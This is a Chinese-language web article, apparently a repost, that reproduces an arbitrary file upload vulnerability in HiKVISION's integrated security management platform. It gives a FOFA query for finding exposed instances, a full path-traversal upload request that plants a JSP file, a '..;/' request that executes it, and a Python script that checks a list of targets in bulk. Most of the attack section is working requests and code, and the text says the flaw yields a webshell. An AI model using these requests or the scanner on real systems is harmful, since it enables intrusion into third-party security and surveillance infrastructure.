推广 热搜： 采购方式滤芯甲带气动隔膜泵减速机减速机型号带式称重给煤机履带无级变速机链式给煤机

HiKVISION综合安防管理平台report任意文件上传漏洞复现(附poc)

日期：2023-09-11 11:01:32 来源：网络整理作者：本站编辑评论：0

申明：本文仅供技术学习参考使用，请勿用作违法用途，否则后果自负。

一、漏洞名称

HiKVISION综合安防管理平台report任意文件上传

二、漏洞影响

HIKVISION-综合安防管理平台

三、漏洞描述

HiKVISION 综合安防管理平台 report接口存在任意文件上传漏洞，攻击者通过构造特殊的请求包可以上传任意文件，可以利用此漏洞获得webshell

四、资产FOFA搜索语句

app="HIKVISION-综合安防管理平台"或title="综合安防管理平台"

五、漏洞复现

向目标发送如下请求数据包，其中字符串ndbmaabfueriigbjadss12345是上传的jsp文件的内容


POST /svm/api/external/report HTTP/1.1Host: xx.xx.xx.xx:80User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcerblvm
------WebKitFormBoundarykcerblvmContent-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/mctc.jsp"Content-Type: application/zip
<%out.print(43000 * 42955);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundarykcerblvm--

收到响应数据包如下，其中path字段表示文件访问路径

HTTP/1.1 200 Access-Control-Allow-Credentials: trueAccess-Control-Allow-Methods: POST, GET, OPTIONS, DELETE, PUT,PATCH, HEADSet-Cookie: JSESSIONID=AC0007173662DB74E766A9F96350B19B; Path=/svm; HttpOnlyTraceid: 5efca7490dd08eb3Pragma: no-cacheExpires: 0Access-Control-Allow-Headers: Content-TypeAccess-Control-Max-Age: 3600Content-Length: 69Content-Type: application/json;charset=UTF-8Cache-Control: no-cacheAccess-Control-Allow-Origin: http://xx.xx.xx.xx:8001/centerDate: Sun, 13 Aug 2023 23:26:47 GMT
{"code":"0x26e31402","msg":"上报的文件格式错误","data":null}

然后访问：

http://xx.xx.xx.xx:80/portal/ui/login/..;/..;/mctc.jsp

响应内容如下

HTTP/1.1 200 Date: Sun, 13 Aug 2023 23:26:47 GMTContent-Type: text/html;charset=ISO-8859-1Set-Cookie: JSESSIONID=YTczNGI4ZDUtYmZiOC00ODMzLWIxNTItYmQwYzllNzhkYmQ5; Path=/portal; HttpOnly; SameSite=Lax
1847065000

页面内容中包含1847065000证明存在该漏洞

六、批量漏洞验证poc

该python脚本可以批量检测漏洞，C:\Users\DELL\Desktop\1003.txt为输入目标文件，每行是一个url

import argparseimport timeimport requests
def get_url(file):    with open('{}'.format(file),'r',encoding='utf-8') as f:        for i in f:            i = i.replace('\n', '')            send_req(i)
def write_result(content):    f = open("result.txt", "a", encoding="UTF-8")    f.write('{}\n'.format(content))    f.close()

def send_req(url_check):    print('{} runing Check'.format(url_check))    url = url_check + '/svm/api/external/report'    header = {        'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69',        'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundarykcerblvm'    }    data = (        "------WebKitFormBoundarykcerblvm"        'Content-Disposition: form-data; name="file";\r\n'        'filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/mctc.jsp"\r\n'        "Content-Type: application/zip\r\n"        "\r\n"        '<%out.print(43000 * 42955);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\r\n'        "\r\n"        "------WebKitFormBoundarykcerblvm--"    )        try:        requests.packages.urllib3.disable_warnings()        response = requests.post(url=url,headers=header,data=data,verify=False,timeout=3)        print(response.text)                url2 = "{}/portal/ui/login/..;/..;/mctc.jsp".format(url_check)        res2 = requests.get(url2)        print(res2.text)        if response.status_code == 200 and res2.status_code == 200 and "1847065000" in res2.text:            result = '{} 存在任意文件上传漏洞! 请访问目标自测：{} \n'.format(url_check,url2)            print(result)            write_result(result)        time.sleep(1)    except Exception as e:        pass
if __name__ == '__main__':    file = r"C:\Users\DELL\Desktop\1003.txt"    get_url(file)

打赏

更多>同类资讯

0 条相关评论

推荐图文

推荐资讯

点击排行